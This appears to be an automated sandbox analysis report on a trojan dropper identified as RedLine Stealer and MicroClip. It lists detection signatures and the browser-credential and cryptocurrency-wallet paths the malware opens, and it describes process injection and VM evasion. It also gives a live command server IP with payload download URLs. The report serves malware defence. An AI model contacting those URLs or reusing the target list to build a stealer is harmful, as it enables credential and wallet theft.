Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information
barindex
Yara detected MicroClip
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 6.0.5BB2.tmp.x.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000000.2210094647.00000000005D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2209592603.000000000AA42000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 5BB2.tmp.x.exe PID: 5400, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe, type: DROPPED
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\atomic\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\Guarda\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: 5BB2.tmp.x.exe PID: 5400, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected MicroClip
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 6.0.5BB2.tmp.x.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000000.2210094647.00000000005D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2209592603.000000000AA42000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1028, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 5BB2.tmp.x.exe PID: 5400, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\5BB2.tmp.x.exe, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1537710 Sample: SecuriteInfo.com.Trojan.Sig... Startdate: 19/10/2024 Architecture: WINDOWS Score: 100 62 Suricata IDS alerts for network traffic 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 8 other signatures 2->68 9 SecuriteInfo.com.Trojan.Siggen29.53958.6245.21630.exe 1 7 2->9         started        process3 file4 52 C:\Users\...\{B268D441C1ED2974164258}.exe, PE32+ 9->52 dropped 54 {B268D441C1ED29741...exe:Zone.Identifier, ASCII 9->54 dropped 104 Found API chain indicative of debugger detection 9->104 106 Contain functionality to detect virtual machines 9->106 108 Contains functionality to inject threads in other processes 9->108 110 4 other signatures 9->110 13 svchost.exe 7 9->13         started        signatures5 process6 dnsIp7 60 176.111.174.140, 1912, 49704, 49705 WILWAWPL Russian Federation 13->60 56 C:\Windows\System32\drivers\etc\hosts, ASCII 13->56 dropped 58 C:\Users\user\AppData\Roaming\...\prefs.js, ASCII 13->58 dropped 112 Changes the view of files in windows explorer (hidden files and folders) 13->112 114 Found API chain indicative of debugger detection 13->114 116 Contain functionality to detect virtual machines 13->116 118 8 other signatures 13->118 18 explorer.exe 72 8 13->18 injected file8 signatures9 process10 file11 40 C:\Users\user\AppData\...\7DF0.tmp.zx.exe, PE32+ 18->40 dropped 42 C:\Users\user\AppData\...\5BB2.tmp.x.exe, PE32 18->42 dropped 70 System process connects to network (likely due to code injection or exploit) 18->70 72 Benign windows process drops PE files 18->72 74 Found API chain indicative of debugger detection 18->74 76 2 other signatures 18->76 22 7DF0.tmp.zx.exe 18->22         started        26 {B268D441C1ED2974164258}.exe 4 18->26         started        28 5BB2.tmp.x.exe 5 4 18->28         started        30 2 other processes 18->30 signatures12 process13 file14 44 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 22->44 dropped 46 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 22->46 dropped 48 C:\Users\user\AppData\Local\...\python38.dll, PE32+ 22->48 dropped 50 47 other files (43 malicious) 22->50 dropped 78 Multi AV Scanner detection for dropped file 22->78 80 Machine Learning detection for dropped file 22->80 32 7DF0.tmp.zx.exe 22->32         started        82 Found API chain indicative of debugger detection 26->82 84 Contain functionality to detect virtual machines 26->84 86 Contains functionality to inject threads in other processes 26->86 88 Found hidden mapped module (file has been removed from disk) 26->88 34 svchost.exe 26->34         started        90 Antivirus detection for dropped file 28->90 92 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 28->92 94 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 28->94 102 2 other signatures 28->102 96 Writes to foreign memory regions 30->96 98 Modifies the context of a thread in another process (thread injection) 30->98 100 Maps a DLL or memory area into another process 30->100 36 svchost.exe 30->36         started        38 svchost.exe 30->38         started        signatures15 process16
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
176.111.174.140
 unknown Russian Federation
201305 WILWAWPL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://176.111.174.140/api/loader.bin true
    		unknown
    http://176.111.174.140/api/bot64.bin true
      		unknown